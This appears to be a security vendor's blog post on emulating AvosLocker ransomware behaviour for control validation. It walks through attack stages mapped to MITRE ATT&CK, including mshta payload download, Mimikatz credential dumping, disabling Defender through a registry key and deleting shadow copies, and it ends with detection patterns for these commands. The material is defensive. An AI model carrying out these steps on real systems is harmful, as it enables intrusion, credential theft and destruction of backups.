On October 11, 2023, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) detailing the identification of Indicators of Compromise (IOCs), Tactics, Techniques, and Procedures (TTPs), and detection methods associated with AvosLocker ransomware identified through FBI investigations as recent as May 2023.
This joint CSA is a continuation of CISA’s ongoing #StopRansomware effort to arm defenders with the intelligence they need to combat different ransomware variants and ransomware threat actors.
AvosLocker is a Ransomware-as-a-Service (RaaS) affiliate-based group discovered in July 2021. Affiliates have compromised organizations across multiple critical infrastructure sectors using legitimate software and open-source remote system administration tools.
In October 2023, in line with the growing trend of targeting Linux-based systems, AvosLocker introduced a Linux variant capable of targeting ESXi virtual machines (VMs).
AvosLocker employs sophisticated evasion techniques, such as forcing the system to restart in safe mode and disabling specific drivers, to bypass certain security measures that are unable to operate in this mode.
AvosLocker uses exfiltration-based data extortion tactics. After their affiliates infect target systems, AvosLocker manages the publishing and hosting of exfiltrated victim data, in addition to directly handling the ransom negotiation. Additionally, they auction off stolen data on their site, adding another layer to their double extortion scheme.
AttackIQ has released a new attack graph that emulates the observed capabilities of AvosLocker ransomware during a series of activities recorded in May 2022 with the goal of helping customers validate their security controls and their ability to defend against this sophisticated threat.
Validating your security program performance against these behaviors is vital to reducing risk. By using this new attack graph in the AttackIQ Security Optimization Platform, security teams will be able to:
- Evaluate security control performance against a threat known for targeting critical infrastructure worldwide.
- Assess their security posture against activities primarily focused on encryption and exfiltration of proprietary information.
- Continuously validate detection and prevention pipelines against behaviors similar to that of many other adversaries focused on ransomware activities.
[CISA AA23-284A] #StopRansomware: AvosLocker Ransomware
(Click for Larger)On October 11, 2023, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) detailing the identification of Indicators of Compromise (IOCs), Tactics, Techniques, and Procedures (TTPs), and detection methods associated with AvosLocker ransomware identified through FBI investigations as recent as May 2023.
In May 2022, Trend Micro reported the discovery of AvosLocker ransomware samples that made use of a legitimate driver to disable security solutions and evade detection. During this investigation, researchers identified that the ransomware was able to scan for the Log4Shell vulnerability on multiple systems through the use of a Nmap NSE script.
During the analysis, the suspected access vector was identified to be the CVE-2021-40539 vulnerability in Zoho ManageEngine ADSelfService Plus (ADSS). Once this vulnerability was exploited, the adversary utilized the Microsoft HTML Application (MSHTA) utility to remotely execute an HTML Application (HTA) file stored in the communication infrastructure.
This attack graph starts immediately after the exploitation of the vulnerability, proceeding with the download and execution of a remote payload using the Microsoft HTML Application (MSHTA) utility. Immediately after the payload is executed, environment reconnaissance is performed. At this stage, the adversary collects information such as basic system details, users and accounts, system’s domain, running processes and security software.
System Binary Proxy Execution: Mshta (T1218.010): Mshta.exe is a native Windows utility that adversaries can abuse to download remote payloads.
System Information Discovery (T1082): The native systeminfo command is executed to retrieve all of the Windows system information.
System Owner/User Discovery (T1033): query user and whoami are called to gain details about the currently available accounts.
Account Discovery: Local Account (T1087.001): The native net user command is executed to get a list of local accounts.
Command and Scripting Interpreter: PowerShell (T1059.001): The PowerShell command GetCurrentDomain() is executed to retrieve domain information.
Process Discovery (T1057): Window’s built-in tasklist command is executed as a command process and the results are saved to a file in a temporary location.
Security Software Discovery (T1518.001): A PowerShell script is executed to determine which software has been installed as an AntiVirusProduct class.
(Click for Larger)In the second stage, a new user account is created and added to the system administrators’ group. Subsequently, a firewall rule is added to allow inbound TCP traffic for AnyDesk. Next, the adversary uses a driver which is installed as a new service named aswSP_ArPot2. Finally, the adversary will attempt to list security product processes using the PowerShell command ‘Get-Process’.
Create Account: Local Account (T1136.001): Actors create a new account using net user.
Valid Accounts: Local Accounts (T1078.003): This scenario will attempt to add a local user to a local Administrators group using the net localgroup command.
Impair Defenses: Disable or Modify System Firewall (T1562.004): This scenario will create a new rule in the Windows System Firewall to allow inbound TCP traffic to the AnyDesk application.
Create or Modify System Process: Windows Service (T1543.003): Use the native sc command line tool to create a new service that will be executed at reboot.
Process Discovery (T1057): This scenario uses the PowerShell cmdlet Get-Process to discover running processes.
(Click for Larger)During the third stage, reconnaissance activities are performed on the compromised network. The adversary seeks to gather information concerning the system’s network configuration, enumerate trusted domains and resolve the domain via DNS.
System Network Configuration Discovery (T1016): The network configuration of the asset is collected using standard Windows utilities like ipconfig, arp, route, nltest, and nslookup.
(Click for Larger)At this stage, the adversary will seek to deploy Mimikatz with the aim of acquiring credentials available on the compromised system. Next, it will seek to target additional systems via Windows Management Instrumentation (WMI) for the purpose of executing remote commands.
Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.
OS Credential Dumping (T1003): This scenario uses Mimikatz to dump passwords and hashes for Windows accounts.
Windows Management Instrumentation (WMI) (T1047): This scenario will attempt to move laterally to any available asset within the network through the use of WMI.
(Click for Larger)The final stage begins with disabling Windows Defender through registry keys to facilitate the proper deployment of AvosLocker. Once the payload is executed, the adversary will aim to establish persistence using a registry RunOnce key. Finally, AvosLocker will attempt to eliminate system backups by removing the Volume Shadow Copy (VSC) and will initiate the mass encryption of data on the system.
Impair Defenses: Disable or Modify Tools (T1562.001): The registry key HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware is set to 1 that will disable Windows Defender from being enabled at next reboot.
Logon Autostart Execution: Registry Run Keys (T1547.001): This scenario sets the HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce registry key that Windows uses to identify what applications should be run at system startup.
Inhibit System Recovery (T1490): Runs vssadmin.exe to delete a recent Volume Shadow Copy created by the attack graph.
Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using the same encryption algorithm used by AvosLocker ransomware.
Detection and Mitigation Opportunities
Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Review CISA’s Patching and Detection Recommendations:
CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the attack graph results.
2. Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1546.001):
Preventing an actor from maintaining a foothold in your environment should always be one of the top priorities. During these activities, the adversary used registry keys to achieve persistence.
2a. Detection
Using a Security Information and Event Management (SIEM) or Endpoint Detection and Response (EDR) Platform to see modifications to the Run and RunOnce keys will alert when unauthorized users or software makes modifications to the keys that allow programs to run after startup.
Process Name = reg.exe
Command Line CONTAINS (“ADD” AND “\CurrentVersion\Run”)
2b. Mitigation
MITRE ATT&CK does not have any direction mitigations as this is abusing legitimate Windows functionality. They recommend monitoring registry changes and process execution that may attempt to add these keys.
3. Inhibit System Recovery (T1490):
Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.
3a. Detection
Detecting deletion of Volume Shadow Copies is usually the first step that occurs and can be detected by looking at the command line activity
Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (“vssadmin” AND “Delete Shadows”)
3b. Mitigation
MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery
Wrap-up
In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the activities carried out by the affiliates of this ransomware. With data generated from continuous testing and use of this attack graph, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.
AttackIQ stands at the ready to help security teams implement this attack graph and other aspects of the AttackIQ Security Optimization Platform, including through our fully managed service, AttackIQ Ready!, and our co-managed security service, AttackIQ Enterprise.
